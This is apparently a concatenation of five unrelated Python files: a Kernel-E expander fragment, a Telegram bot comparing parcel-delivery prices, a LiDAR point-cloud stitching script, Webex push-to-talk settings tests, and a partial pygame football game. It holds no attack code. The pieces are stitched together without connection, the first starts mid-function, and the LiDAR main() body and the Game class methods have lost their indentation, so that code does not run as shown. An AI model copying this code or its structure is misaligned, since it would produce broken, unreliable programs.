    """Expand a list/map comprehension into a *collector* accumulator call.

    Like expandFor, but the loop body object takes a third `skip` ejector
    parameter used when the optional filter rejects an entry, and the
    whole thing is driven by __accumulateList/__accumulateMap.

    NOTE(review): the missing-key check here is `key is None`, while
    expandFor tests `key.tag.name == "null"` — confirm which form the
    grammar actually passes for comprehensions.
    """
    if key is None:
        key = t.IgnorePattern(None)
    validateFor(self, scope(exp), scope(coll))
    validateFor(self, scope(key).add(scope(value)), scope(coll))
    fTemp = self.mktemp("validFlag")
    kTemp = self.mktemp("key")
    vTemp = self.mktemp("value")
    skip = self.mktemp("skip")
    kv = [t.Def(key, None, kTemp), t.Def(value, None, vTemp)]
    if filtr:
        # Filtered: evaluate exp only when the filter passes, else eject via skip.
        value = t.SeqExpr(kv + [t.If(filtr, exp, t.MethodCallExpr(skip, "run", []))])
    else:
        value = t.SeqExpr(kv + [exp])
    obj = t.Object(
        "For-loop body", t.IgnorePattern(None),
        [None],
        t.Script(
            None,
            [t.Method(None, "run",
                      [t.FinalPattern(kTemp, None),
                       t.FinalPattern(vTemp, None),
                       t.FinalPattern(skip, None)],
                      None,
                      t.SeqExpr([
                          # Reject invocation after the accumulation has finished.
                          mcall("__validateFor", "run", fTemp),
                          value]))],
            []))
    return t.SeqExpr([
        t.Def(
            t.VarPattern(fTemp, None), None,
            t.NounExpr("true")),
        t.Finally(
            t.MethodCallExpr(
                t.NounExpr(collector),
                "run",
                [coll, obj]),
            # Invalidate the body once the collector returns.
            t.Assign(fTemp, t.NounExpr("false")))])
def expandMatchBind(self, spec, patt):
    """Expand `spec =~ patt` into an Escape that attempts the match.

    On success the escape yields [true, <binding of each pattern name>];
    on failure every pattern name is rebound to a broken reference
    carrying the problem, and false is yielded.  The boolean result is
    what the surrounding expression sees.
    """
    pattScope = scope(patt)
    specScope = scope(spec)
    # The specimen must not use names the pattern is about to define.
    conflicts = pattScope.outNames() & specScope.namesUsed()
    if conflicts:
        err("Use on left isn't really in scope of matchbind pattern: %s" %
            (', '.join(conflicts)), self)
    sp = self.mktemp("sp")
    ejector = self.mktemp("fail")
    result = self.mktemp("ok")
    problem = self.mktemp("problem")
    broken = self.mktemp("b")
    patternNouns = [t.NounExpr(n) for n in pattScope.outNames()]
    return t.SeqExpr([
        t.Def(t.FinalPattern(sp, None), None, spec),
        t.Def(
            t.ListPattern([t.FinalPattern(result, None)] +
                          [t.BindingPattern(n) for n in patternNouns], None),
            None,
            t.Escape(
                t.FinalPattern(ejector, None),
                t.SeqExpr([
                    # Attempt the match; a mismatch fires the ejector.
                    t.Def(patt, ejector, sp),
                    mcall("__makeList", "run",
                          TRUE, *[t.BindingExpr(n) for n in patternNouns])]),
                t.FinalPattern(problem, None),
                t.SeqExpr([
                    # Failure: one shared broken binding stands in for
                    # every name the pattern would have defined.
                    t.Def(slotpatt(broken), None,
                          mcall("Ref", "broken", problem)),
                    mcall("__makeList", "run",
                          FALSE, *([t.BindingExpr(broken)] * len(patternNouns)))]))),
        result])
def broke(br, ex):
    """Define *br* as a broken reference carrying *ex*.

    NOTE(review): t.Def is called with two arguments here, while every other
    call site in this module passes three (pattern, exit, expr) — confirm
    whether a None exit argument was intended, or whether this helper is
    unused/dead.
    """
    return t.Def(t.FinalPattern(br, None),
                 mcall("Ref", "broken", mcall("__makeList", "run", ex)))
def slot(n):
    """Desugar &noun: fetch the slot out of the noun's binding."""
    binding = t.BindingExpr(n)
    return t.MethodCallExpr(binding, 'get', [])
def slotpatt(n):
    """Build a via-pattern coercing a slot into a binding for *n*."""
    converter = t.NounExpr("__slotToBinding")
    return t.ViaPattern(converter, t.BindingPattern(n))
# Operator-term tag -> verb name; used by the AugAssign grammar rule above
# to desugar `x op= y` into the matching verb-assignment.
binops = {
    "Add": "add",
    "Subtract": "subtract",
    "Multiply": "multiply",
    "Divide": "approxDivide",
    "Mod": "mod",
    "Pow": "pow",
    "FloorDivide": "floorDivide",
    "ShiftRight": "shiftRight",
    "ShiftLeft": "shiftLeft",
    "BinaryAnd": "and",
    "BinaryOr": "or",
    "BinaryXor": "xor",
    "ButNot": "butNot"
}
# Grammar for the Reifier pass: replaces every TempNounExpr left over after
# expansion with a unique concrete noun (see reifyNoun below).
reifier = r"""
TempNounExpr(@basename @o) -> reifyNoun(self, basename, o)
"""
def reifyNoun(self, base, o):
    """Give a TempNounExpr a unique concrete name, memoized per (base, o).

    Bumps the counter until "<base>__<id>" collides with no known noun,
    records the winner in self.nouns, and caches the resulting NounExpr so
    the same temporary always reifies to the same noun.
    """
    key = (base, o)
    cached = self.cache.get(key)
    if cached is not None:
        return cached
    while True:
        self.id += 1
        candidate = "%s__%s" % (base, self.id)
        if candidate not in self.nouns:
            break
    self.nouns.add(candidate)
    node = t.NounExpr(candidate)
    self.cache[key] = node
    return node
cycleRenamer = r"""
NounExpr(@name) (?(name in self.renamings) -> self.renamings[name]
| -> t.NounExpr(name))
"""
def expand(term, scope=None):
    """Expand *term* to Kernel-E, then reify leftover temporary nouns.

    Note: the *scope* parameter intentionally shadows the module-level
    scope() helper; it is only stored on the expander instance.
    """
    expanderPass = Expander([term])
    expanderPass.scope = scope
    expanderPass.nouns = set()
    expanderPass.counter = 0
    expanded = expanderPass.apply("transform")[0]
    reifierPass = Reifier([expanded])
    reifierPass.nouns = set(expanderPass.nouns)
    reifierPass.cache = {}
    reifierPass.id = 0
    return reifierPass.apply("transform")[0]
def mktemp(self, name):
    """Allocate a fresh TempNounExpr tagged with a unique counter value."""
    self.counter = self.counter + 1
    return t.TempNounExpr(name, self.counter)
# Compile the grammar strings above into tree-transformer parser classes.
StaticScopeTransformer = TreeTransformerGrammar.makeGrammar(computeStaticScopeRules, "StaticScopeTransformer").createParserClass(TreeTransformerBase, globals())
Expander = TreeTransformerGrammar.makeGrammar(expander, name="EExpander").createParserClass(TreeTransformerBase, globals())
# The generated class has no mktemp; graft the module-level helper on as a method.
Expander.mktemp = mktemp
Reifier = TreeTransformerGrammar.makeGrammar(reifier, name="Reifier").createParserClass(TreeTransformerBase, globals())
CycleRenamer = TreeTransformerGrammar.makeGrammar(cycleRenamer, name="CycleRenamer").createParserClass(TreeTransformerBase, globals())
|
# -*- coding: utf-8 -*-
# Telegram bot: quotes parcel-delivery prices from three carriers
# (Dellin, SberLogistics, GlavDostavka) for a user-supplied route.
import json, os, requests
from dotenv import load_dotenv
from telegram import Bot, InlineKeyboardButton, InlineKeyboardMarkup, Update
from telegram.ext import (CallbackContext, CallbackQueryHandler,
                          CommandHandler, Filters, MessageHandler, Updater)
# Pull configuration from a local .env file into the process environment.
load_dotenv()
TELEGRAM_TOKEN = os.getenv('TELEGRAM_TOKEN')
CHAT_ID = os.getenv('TELEGRAM_CHAT_ID')  # NOTE(review): not referenced below — confirm before removing
DELLIN_KEY = os.getenv('DELLIN_KEY')  # Dellin API application key ("appkey")
DELLIN_ID = os.getenv('DELLIN_ID')  # Dellin API session id ("sessionID")
URL_DELLIN_CALC = os.getenv('URL_DELLIN_CALC')
URL_DELLIN_KLADR = os.getenv('URL_DELLIN_KLADR')
URL_SBER = os.getenv('URL_SBER')
URL_GLAVDOSTAVKA = os.getenv('URL_GLAVDOSTAVKA')
# In-memory dialog state: user_id -> {'progress', 'derival', 'arrival'}.
USERS = {}
bot = Bot(TELEGRAM_TOKEN)
updater = Updater(TELEGRAM_TOKEN)
def start(update, context):
    """Begin a new calculation dialog: reset state, ask for the origin city."""
    user_id = update.effective_user.id
    USERS[user_id] = {'progress': 1, 'derival': '', 'arrival': ''}
    chat_id = update.effective_message.chat.id
    bot.send_message(chat_id, 'Введите город отправления посылки')
def progress(update, context):
    """Route an incoming text message to the proper dialog step.

    Step 1 records the origin city, step 2 runs the calculation.
    BUG FIX: messages from users with no stored state (never sent /start,
    or state already cleared after a result/error) previously raised
    KeyError; they are now ignored.
    """
    state = USERS.get(update.effective_user.id)
    if state is None:
        return None
    if state['progress'] == 1:
        return city(update, context)
    if state['progress'] == 2:
        return result(update, context)
def city(update: Update, context: CallbackContext):
    """Store the origin city and prompt for the destination city."""
    user_id = update.effective_user.id
    USERS[user_id]['derival'] = update['message']['text']
    USERS[user_id]['progress'] = 2
    chat_id = update.effective_message.chat.id
    bot.send_message(chat_id, 'Введите город получения посылки')
def result(update: Update, context: CallbackContext):
    """Compute delivery quotes for the stored route and reply to the user.

    Resolves both cities, queries Dellin, SberLogistics and GlavDostavka,
    sends a price/terms summary, clears the user's dialog state and offers
    a restart button.
    """
    USERS[update.effective_user.id]['arrival'] = update['message']['text']
    derival = USERS[update.effective_user.id]['derival'].lower()
    arrival = USERS[update.effective_user.id]['arrival'].lower()
    # Resolve both cities to Dellin KLADR codes.
    derival_dellin = requests.post(
        URL_DELLIN_KLADR,
        json={"appkey": DELLIN_KEY,
              "q": derival,
              "limit": 1}
    )
    arrival_dellin = requests.post(
        URL_DELLIN_KLADR,
        json={"appkey": DELLIN_KEY,
              "q": arrival,
              "limit": 1}
    )
    try:
        derival_dellin = derival_dellin.json().get('cities')[0]['code']
        arrival_dellin = arrival_dellin.json().get('cities')[0]['code']
    # IndexError: empty match list; TypeError: missing 'cities' key
    # (subscripting the None returned by .get).
    except (IndexError, TypeError):
        del USERS[update.effective_user.id]
        keyboard = [[InlineKeyboardButton(
            'Новый расчет',
            callback_data='new'
        )]]
        reply_markup = InlineKeyboardMarkup(keyboard)
        bot.send_message(update.effective_message.chat.id,
                         'Ошибка в названии города. Попробуйте еще.',
                         reply_markup=reply_markup
                         )
        # BUG FIX: execution previously fell through after the error message
        # and crashed on the carrier requests below (the _dellin names still
        # held raw Response objects). Stop here instead.
        return
    dellin = requests.post(
        URL_DELLIN_CALC,
        json={"appkey": DELLIN_KEY,
              "sessionID": DELLIN_ID,
              "derival": {"city": derival_dellin},
              "arrival": {"city": arrival_dellin}
              }
    )
    with open('sber_cities.json', 'r', encoding='utf-8') as g:
        sber_cities = json.load(g)
    # .get('name', '') matches the GlavDostavka lookup below and avoids an
    # AttributeError on entries without a name.
    # NOTE(review): the [0] lookups still raise IndexError when the city is
    # absent from a carrier's list — confirm desired handling.
    derival_sber = [city['kladr_id'] for city in sber_cities
                    if city.get('name', '').lower() == derival][0]
    arrival_sber = [city['kladr_id'] for city in sber_cities
                    if city.get('name', '').lower() == arrival][0]
    sber = requests.post(
        URL_SBER,
        json={"id": "JsonRpcClient.js",
              "jsonrpc": "2.0",
              "method": "calculateShipping",
              "params": {
                  "stock": True,
                  "kladr_id_from": derival_sber,
                  "kladr_id": arrival_sber,
                  "length": 50,
                  "width": 35,
                  "height": 35,
                  "weight": 5,
                  "cod": 0,
                  "declared_cost": 0,
                  "courier": "sberlogistics"
              }
              }
    )
    sber = sber.json()['result']['methods'][0]
    with open('glav_cities.json', 'r', encoding='utf-8') as g:
        GLAV_CITIES = json.load(g)
    derival_glav = [city['id'] for city in GLAV_CITIES
                    if city.get('name', '').lower() == derival][0]
    arrival_glav = [city['id'] for city in GLAV_CITIES
                    if city.get('name', '').lower() == arrival][0]
    glavdostavka = requests.post(
        URL_GLAVDOSTAVKA + f'&depPoint={derival_glav}&arrPoint={arrival_glav}'
    )
    price_glavdostavka = glavdostavka.json()['price']
    dellin = dellin.json()['data']['terminals_standard']
    price_dellin = dellin['price']
    period_dellin = dellin['period_to']
    price_sber = sber['cost']['total']['sum']
    period_sber = sber['max_days']
    # Quotes gathered: clear the dialog state and offer a new calculation.
    del USERS[update.effective_user.id]
    keyboard = [[InlineKeyboardButton('Новый расчет', callback_data='new')]]
    reply_markup = InlineKeyboardMarkup(keyboard)
    derival = derival[0].upper() + derival[1:]
    arrival = arrival[0].upper() + arrival[1:]
    bot.send_message(update.effective_message.chat.id,
                     f'Стоимость и сроки доставки посылки с габаритами '
                     f'не превышающими 0.5х0.35х0.35(м) и массой не более 5кг '
                     f'из города {derival} в город {arrival} '
                     f'(от терминала до терминала):\n\n'
                     f'Деловые линии: {price_dellin} руб. '
                     f'До {period_dellin} дней.\n'
                     f'СберЛогистика: {price_sber} руб. '
                     f'До {period_sber} дней.\n'
                     f'ГлавДоставка: {price_glavdostavka} руб',
                     reply_markup=reply_markup
                     )
def button(update: Update, context: CallbackContext):
    """Handle the 'new calculation' inline button by restarting the dialog."""
    start(update, context)
def main():
    """Register the bot's handlers and poll for updates until interrupted."""
    dispatcher = updater.dispatcher
    dispatcher.add_handler(CommandHandler('start', start))
    dispatcher.add_handler(CallbackQueryHandler(button))
    dispatcher.add_handler(MessageHandler(Filters.text, progress))
    updater.start_polling()
    updater.idle()
# Run the bot only when executed as a script, not on import.
if __name__ == '__main__':
    main()
|
#!/usr/bin/env python3
"""
Sample script to combine LiDAR data to generate point cloud.
"""
import argparse
import datetime
import matplotlib.pyplot
import numpy
import pytz
import scipy.interpolate
import scipy.spatial.transform
import utm
from mpl_toolkits.mplot3d import Axes3D
import cepton_sdk.export
import cepton_sdk.plot
from cepton_sdk.common import *
from cepton_util.common import *
def from_gps_time(weeks, seconds):
    """Convert a GPS week/seconds-of-week pair to a Unix timestamp (float s).

    GPS time starts at 1980-01-06 00:00:00 UTC and does not apply leap
    seconds; the fixed 18 s offset converts GPS time to UTC (correct for
    dates after 2017 — update if another leap second is announced).

    Uses the stdlib datetime.timezone.utc instead of pytz; the result is
    identical to pytz.utc.localize(d).timestamp().
    """
    gps_epoch = datetime.datetime(1980, 1, 6, tzinfo=datetime.timezone.utc)
    d = gps_epoch + datetime.timedelta(weeks=weeks, seconds=seconds)
    # leapseconds
    d -= datetime.timedelta(seconds=18)
    return d.timestamp()
class Transforms(StructureOfArrays):
    """Array-of-poses container: per-sample timestamp, translation, quaternion."""
    def __init__(self, n=0):
        super().__init__(n)
        self.timestamps = numpy.zeros([n])  # Unix timestamps [s]
        self.translations = numpy.zeros([n, 3])  # x, y from UTM; z from the serial height field
        self.quaternions = numpy.zeros([n, 4])  # filled from Rotation.as_quat() (x, y, z, w order)
    @classmethod
    def _get_array_member_names(cls):
        # Attribute names StructureOfArrays slices/len()s over.
        return ["timestamps", "translations", "quaternions"]
    @property
    def rotations(self):
        # NOTE(review): direct Rotation(...) construction is deprecated in
        # newer SciPy in favor of Rotation.from_quat — confirm the pinned
        # SciPy version still accepts this call.
        return scipy.spatial.transform.Rotation(self.quaternions)
def main():
parser = argparse.ArgumentParser(
usage="%(prog)s [OPTIONS] output_path",
formatter_class=argparse.RawTextHelpFormatter)
parser.add_argument("output", help="Output path.")
parser.add_argument("--downsample", action="store_true")
parser.add_argument("--points_path", help="Path to points", required=True)
parser.add_argument(
"--serial_path", help="Path to serial data", required=True)
parser.add_argument("--version", action="version",
version="cepton_sdk {}".format(cepton_sdk.__version__))
args = parser.parse_args()
output_path = fix_path(args.output)
# Load points
points_path = fix_path(args.points_path)
points = cepton_sdk.export.load_points_las(points_path)[0]
# Load serial
serial_path = fix_path(args.serial_path)
with open(serial_path, "r") as f:
serial_lines = f.readlines()
transforms = Transforms(len(serial_lines))
i_transform = 0
for line in serial_lines:
if line.startswith("#INSPVA"):
# Novatel
line = line.lstrip("#").split("*")[0]
header, data = line.split(";")
header = header.split(",")
data = [None, None] + data.split(",")
if len(data) != 14:
continue
if data[13] != "INS_SOLUTION_GOOD":
continue
transforms.timestamps[i_transform] = \
from_gps_time(float(data[2]), float(data[3]))
transforms.translations[i_transform, :2] = utm.from_latlon(
float(data[4]), float(data[5]))[:2]
if i_transform == 0:
print("UTM: {}".format(utm.from_latlon(
float(data[4]), float(data[5]))[2:]))
transforms.translations[i_transform, 2] = float(data[6])
transforms.quaternions[i_transform, :] = \
scipy.spatial.transform.Rotation.from_euler(
"zxy",
[-float(data[12]), float(data[11]), float(data[10])],
degrees=True).as_quat()
i_transform += 1
transforms = transforms[:i_transform]
t_diff = numpy.diff(transforms.timestamps)
assert (numpy.all(t_diff > 0))
# DEBUG
print(datetime.datetime.utcfromtimestamp(transforms.timestamps[0]))
print(datetime.datetime.utcfromtimestamp(points.timestamps[0]))
print(datetime.datetime.utcfromtimestamp(points.timestamps[-1]))
print(datetime.datetime.utcfromtimestamp(transforms.timestamps[-1]))
# HACK
# points.timestamps_usec[:] += to_usec(
# 30 + transforms.timestamps[0] - points.timestamps[0])
# Plot point timestamps
# matplotlib.pyplot.plot(points.timestamps)
# matplotlib.pyplot.show()
# return
# Plot 3d trajectory
# fig = matplotlib.pyplot.figure()
# ax = fig.add_subplot(projection="3d")
# matplotlib.pyplot.plot(
# transforms.translations[:, 0], transforms.translations[:, 1],
# transforms.translations[:, 2], 'o')
# matplotlib.pyplot.show()
# return
# Plot 2d trajectory with directions
# matplotlib.pyplot.axis("equal")
# matplotlib.pyplot.plot(
# transforms.translations[:, 0], transforms.translations[:, 1])
# directions = numpy.zeros([len(transforms), 3])
# directions[:, 1] = 1.0
# directions = transforms.rotations.apply(directions)
# matplotlib.pyplot.quiver(
# transforms.translations[::10, 0], transforms.translations[::10, 1],
# directions[::10, 0], directions[::10, 1])
# matplotlib.pyplot.show()
# return
indices = numpy.arange(0, len(points))
# Apply pose
is_valid = numpy.logical_and(
points.timestamps > transforms.timestamps[0],
points.timestamps < transforms.timestamps[-1])
indices = indices[is_valid]
translations_tmp = scipy.interpolate.interp1d(
transforms.timestamps, transforms.translations, axis=0)(
points.timestamps[indices])
rotations_tmp = \
scipy.spatial.transform.Slerp(
transforms.timestamps, transforms.rotations)(
points.timestamps[indices])
points.positions[indices, :] = \
rotations_tmp.apply(points.positions[indices, :]) + \
translations_tmp
# Grid downsample
if args.downsample:
grid_ub = numpy.full([3], 1e4)
grid_lb = -grid_ub
grid_spacing = numpy.full([3], 0.01)
grid_shape = ((grid_ub - grid_lb) / grid_spacing).astype(int)
def get_flat_grid_indices(positions):
    """Map an (N, 3) array of positions to flat voxel-grid indices.

    Returns an int array of length N; entries are -1 for points that fall
    outside the grid on any axis.  Uses the enclosing scope's grid_lb,
    grid_spacing and grid_shape (closure variables).
    """
    grid_indices = ((positions - grid_lb) / grid_spacing).astype(int)
    # A point is valid only if its voxel index is in-bounds on all 3 axes.
    is_valid = numpy.logical_and(
        numpy.all(grid_indices >= 0, axis=1),
        numpy.all(grid_indices < grid_shape, axis=1))
    flat_grid_indices = numpy.full(grid_indices.shape[0], -1)
    # ravel_multi_index flattens (ix, iy, iz) into a single scalar per point,
    # suitable for duplicate detection with numpy.unique.
    flat_grid_indices[is_valid] = numpy.ravel_multi_index(
        grid_indices[is_valid, :].transpose(), grid_shape)
    return flat_grid_indices
grid_indices = get_flat_grid_indices(points.positions[indices, :])
is_valid = grid_indices >= 0
indices = indices[is_valid]
grid_indices = grid_indices[is_valid]
is_valid = numpy.unique(grid_indices, return_index=True)[1]
indices = indices[is_valid]
grid_indices = grid_indices[is_valid]
assert (len(indices) > 0)
points = points[indices]
# Save
cepton_sdk.export.save_points(
points, output_path, file_type=cepton_sdk.export.PointsFileType.LAS)
# Load
points_tmp = cepton_sdk.export.load_points(output_path)[0]
assert (numpy.max(numpy.abs(points.positions - points_tmp.positions)) < 1e-3)
points = points_tmp
# Plot points
cepton_sdk.plot.plot_points(points)
if __name__ == "__main__":
main()
|
"""
Test for person PTT settings
"""
import random
from concurrent.futures import ThreadPoolExecutor
from contextlib import contextmanager
from dataclasses import dataclass
from wxc_sdk.all_types import *
from .base import TestCaseWithUsers
class TestRead(TestCaseWithUsers):
    def test_001_read_all(self):
        """
        Read PTT settings of all users
        """
        ptt_api = self.api.person_settings.push_to_talk

        # Fan the reads out over a thread pool; one read per user.
        with ThreadPoolExecutor() as pool:
            results = list(pool.map(
                lambda u: ptt_api.read(person_id=u.person_id),
                self.users))

        print(f'Got PTTsettings for {len(self.users)} users')
        print('\n'.join(result.json() for result in results))
@dataclass(init=False)
class TestUpdate(TestCaseWithUsers):
    # NOTE(review): @dataclass(init=False) on a TestCase subclass is unusual;
    # presumably required by the project's base class -- confirm it is intentional.

    @contextmanager
    def target_user(self):
        """
        Get target user

        Context manager: yields a randomly chosen user; on exit the PTT
        settings captured on entry are written back and verified by read-back.
        """
        user = random.choice(self.users)
        ptt = self.api.person_settings.push_to_talk
        settings = ptt.read(person_id=user.person_id)
        try:
            yield user
        finally:
            # restore old settings
            ptt.configure(person_id=user.person_id, settings=settings)
            restored = ptt.read(person_id=user.person_id)
            self.assertEqual(settings, restored)

    def test_001_toggle_allow_auto_answer(self):
        """
        Toggle allow_auto_answer on random user
        """
        with self.target_user() as user:
            ptt = self.api.person_settings.push_to_talk
            user: Person
            before = ptt.read(person_id=user.person_id)
            settings = PushToTalkSettings(allow_auto_answer=not before.allow_auto_answer)
            ptt.configure(person_id=user.person_id, settings=settings)
            after = ptt.read(person_id=user.person_id)
            self.assertEqual(settings.allow_auto_answer,
                             after.allow_auto_answer)
            # apart from the toggled attribute nothing else may change
            after.allow_auto_answer = before.allow_auto_answer
            self.assertEqual(before, after)

    def test_002_toggle_connection_type(self):
        """
        Toggle connection_type on random user
        """
        with self.target_user() as user:
            ptt = self.api.person_settings.push_to_talk
            user: Person
            before = ptt.read(person_id=user.person_id)
            # pick any connection type other than the current one
            settings = PushToTalkSettings(connection_type=next(ct for ct in PTTConnectionType
                                                               if ct != before.connection_type))
            ptt.configure(person_id=user.person_id, settings=settings)
            after = ptt.read(person_id=user.person_id)
            self.assertEqual(settings.connection_type,
                             after.connection_type)
            after.connection_type = before.connection_type
            self.assertEqual(before, after)

    def test_003_toggle_access_type(self):
        """
        Toggle access_type on random user
        """
        with self.target_user() as user:
            ptt = self.api.person_settings.push_to_talk
            user: Person
            before = ptt.read(person_id=user.person_id)
            # pick any access type other than the current one
            settings = PushToTalkSettings(access_type=next(at for at in PushToTalkAccessType
                                                           if at != before.access_type))
            ptt.configure(person_id=user.person_id, settings=settings)
            after = ptt.read(person_id=user.person_id)
            self.assertEqual(settings.access_type,
                             after.access_type)
            after.access_type = before.access_type
            self.assertEqual(before, after)

    def test_004_add_members(self):
        """
        Add five monitored members (as MonitoredMember objects) to a random user
        """
        with self.target_user() as user:
            ptt = self.api.person_settings.push_to_talk
            user: Person
            before = ptt.read(person_id=user.person_id)
            members_before = before.members or []
            members_before_ids = set(m.member_id for m in members_before)
            # only users not already monitored are candidates
            candidates = [user for user in self.users if user.person_id not in members_before_ids]
            if len(candidates) < 5:
                self.skipTest('Need at least 5 users to add')
            to_add = random.sample(candidates, 5)
            settings = PushToTalkSettings(members=[MonitoredMember(member_id=u.person_id) for u in to_add])
            ptt.configure(person_id=user.person_id, settings=settings)
            after = ptt.read(person_id=user.person_id)
            self.assertEqual(len(to_add), len(after.members))
            to_add_set = set(m.person_id for m in to_add)
            members_set_after = set(m.member_id for m in after.members)
            self.assertEqual(to_add_set, members_set_after)
            after.members = before.members
            self.assertEqual(before, after)

    def test_005_add_members_by_id(self):
        """
        Add five monitored members (by plain person id) to a random user
        """
        with self.target_user() as user:
            ptt = self.api.person_settings.push_to_talk
            user: Person
            before = ptt.read(person_id=user.person_id)
            members_before = before.members or []
            members_before_ids = set(m.member_id for m in members_before)
            # only users not already monitored are candidates
            candidates = [user for user in self.users if user.person_id not in members_before_ids]
            if len(candidates) < 5:
                self.skipTest('Need at least 5 users to add')
            to_add = random.sample(candidates, 5)
            # unlike test_004, members are passed as bare ids
            settings = PushToTalkSettings(members=[u.person_id for u in to_add])
            ptt.configure(person_id=user.person_id, settings=settings)
            after = ptt.read(person_id=user.person_id)
            self.assertEqual(len(to_add), len(after.members))
            to_add_set = set(m.person_id for m in to_add)
            members_set_after = set(m.member_id for m in after.members)
            self.assertEqual(to_add_set, members_set_after)
            after.members = before.members
            self.assertEqual(before, after)
|
"""
Contains the central game class
Manages interactions with the players and the ball
"""
from settings import *
from const import ACT
from ball import Ball
from stats import Stats
from camera import Camera
from pygame import mixer
import time
# Initialise the mixer (44.1 kHz, 16-bit signed, stereo, 2 KiB buffer) and
# pre-load every in-game sound effect once at import time.
mixer.init(44100, -16, 2, 2048)
applause = mixer.Sound(APPLAUSE)
kick = mixer.Sound(KICK)
single_short_whistle = mixer.Sound(SINGLE_SHORT_WHISTLE)
# NOTE(review): the constant is misspelled ("WHISLTE") where it is defined
single_long_whistle = mixer.Sound(SINGLE_LONG_WHISLTE)
three_whistles = mixer.Sound(THREE_WHISTLES)
# (removed a duplicate `applause = mixer.Sound(APPLAUSE)` that re-loaded the
# same file and rebound the name to a second identical Sound object)
class Game:
""" Class that controls the entire game """
def __init__(self, team1, team2, sound=True, difficulty=0.6, cam='default'):
    """
    Initializes the game

    Attributes:
        team1 (Team): Right-facing team
        team2 (Team): Left-facing team
        sound (bool): Enable / Disable in-game sounds
        difficulty (float): Game difficulty (0-1)
        cam (str): Camera mode passed through to Camera (defaults to 'default')
    """
    self.sound = sound
    self.difficulty = difficulty
    self.debug = False  # toggled at runtime via Ctrl+Shift+Alt+D
    self.team1 = team1
    self.team1.init(id=1, dir='L', diff=self.difficulty) # direction is hardcoded, don't change
    self.team2 = team2
    self.team2.init(id=2, dir='R', diff=self.difficulty)
    # ball starts at the centre of the pitch
    self.ball = Ball(pos=(W//2, H//2), sound=sound)
    self.stats = Stats()
    self.cam = Camera(self.ball.pos.x, self.ball.pos.y, mode=cam)
    self.end = False # True when the game ends (never probably)
    self.pause = False
    self.state_prev = None
    # game state to be passed to agents (see get_state() function)
    self.state = None
    self.rewards = None
    if self.sound:
        # kick-off whistle plus looping crowd noise
        single_short_whistle.play()
        applause.play(-1)
def check_interruptions(self):
    """
    Check for special keyboard buttons

    Sets internal flags to pause, quit the game or run it in debug mode.
    Drains the pygame event queue as a side effect.
    """
    for event in pygame.event.get():
        if event.type == pygame.QUIT: # Quit
            mixer.pause()
            if self.sound:
                three_whistles.play()
            self.end = True
            pygame.quit()
        if event.type == pygame.KEYDOWN:
            if event.key == pygame.K_ESCAPE: # Pause menu
                self.pause = not self.pause
                if self.pause:
                    # entering pause: silence everything, long whistle
                    mixer.pause()
                    if self.sound:
                        single_long_whistle.play()
                else:
                    # resuming play: short whistle and crowd loop again
                    if self.sound:
                        single_short_whistle.play()
                        applause.play(-1)
            if event.key == pygame.K_BACKSPACE: # Return to main menu
                mixer.stop()
                self.end = True
            if event.key == pygame.K_SPACE: # Toggle whether to maintain formation
                self.team1.maintain_formation = not self.team1.maintain_formation
            if event.key == pygame.K_d: # Debug mode
                # requires Ctrl+Shift+Alt+D chord to avoid accidental toggles
                mods = pygame.key.get_mods()
                if mods & pygame.KMOD_CTRL and mods & pygame.KMOD_SHIFT and mods & pygame.KMOD_ALT:
                    self.debug = not self.debug
def same_team_collision(self, team, free):
    """
    Check if current player collides with any other players of the same team

    Overlapping teammates are nudged apart along both axes.

    Attributes:
        team (Team): team whose players are checked pairwise
        free (bool): whether the ball is free; when held, the x-threshold
            is widened by BALL_RADIUS

    NOTE(review): the double loop visits every colliding pair twice --
    (a, b) and (b, a) -- so the separation nudge is applied twice per frame;
    confirm this is intended rather than iterating unordered pairs.
    NOTE(review): the increments here use PLAYER_RADIUS while
    diff_team_collision uses 2*PLAYER_RADIUS for the analogous computation;
    verify the asymmetry is deliberate.
    """
    min_dist = P(2*PLAYER_RADIUS, 2*PLAYER_RADIUS)
    if not free:
        min_dist.x += BALL_RADIUS
    for player1 in team.players:
        for player2 in team.players:
            if player1.id != player2.id and abs(player1.pos.x - player2.pos.x) <= min_dist.x and abs(player1.pos.y - player2.pos.y) <= min_dist.y:
                # half the per-axis overlap, plus 1 so progress is always made
                xincr = 1 + PLAYER_RADIUS - \
                    abs(player1.pos.x-player2.pos.x)//2
                xdir = (1, -1)
                yincr = 1 + PLAYER_RADIUS - \
                    abs(player1.pos.y-player2.pos.y)//2
                ydir = (1, -1)
                # push each player away from the other on each axis
                if player1.pos.x < player2.pos.x:
                    xdir = (-1, 1)
                if player1.pos.y < player2.pos.y:
                    ydir = (-1, 1)
                player1.pos.x += xdir[0]*xincr
                player2.pos.x += xdir[1]*xincr
                player1.pos.y += ydir[0]*yincr
                player2.pos.y += ydir[1]*yincr
def diff_team_collision(self, team1, team2, free):
    """
    Check if current player collides with any other players of the opposite team

    Overlapping opponents are nudged apart; if the ball is held during the
    contact it is dropped (tackle), via ball.reset at the current position.

    Attributes:
        team1 (Team): first team
        team2 (Team): second team
        free (bool): whether the ball is free; when held, the x-threshold
            is widened by BALL_RADIUS and a collision releases the ball
    """
    min_dist = P(2*PLAYER_RADIUS, 2*PLAYER_RADIUS)
    if not free:
        min_dist.x += BALL_RADIUS
    for player1 in team1.players:
        for player2 in team2.players:
            if abs(player1.pos.x - player2.pos.x) <= min_dist.x and abs(player1.pos.y - player2.pos.y) <= min_dist.y:
                if not free:
                    # contact while the ball is possessed: drop the ball in place
                    self.ball.reset(self.ball.pos)
                # half the per-axis overlap, plus 1 so progress is always made
                xincr = 1 + 2*PLAYER_RADIUS - \
                    abs(player1.pos.x-player2.pos.x)//2
                xdir = (1, -1)
                yincr = 1 + 2*PLAYER_RADIUS - \
                    abs(player1.pos.y-player2.pos.y)//2
                ydir = (1, -1)
                # push the players away from each other on each axis
                if player1.pos.x < player2.pos.x:
                    xdir = (-1, 1)
                if player1.pos.y < player2.pos.y:
                    ydir = (-1, 1)
                player1.pos.x += xdir[0]*xincr
                player2.pos.x += xdir[1]*xincr
                player1.pos.y += ydir[0]*yincr
                player2.pos.y += ydir[1]*yincr
def collision(self, team1, team2, ball):
"""
Handle collisions between all in-game players.
"""
self.same_team_collision(team1, self.ball.free)
self.same_team_collision(team2, self.ball.free)
self.diff_team_collision(team1, team2, self.ball.free)
def text_draw(self, win, text, rect, align='center'):
    """
    Utility to draw text

    Attributes:
        win (pygame.display): window for rendering
        text (pygame.font (rendered)): The text object
        rect (tuple): Rectangle specified as (x, y, width, height)
        align (string): text alignment can be one of 'left', 'right', 'center' (defaults to 'center')
    """
    text_w = text.get_width()
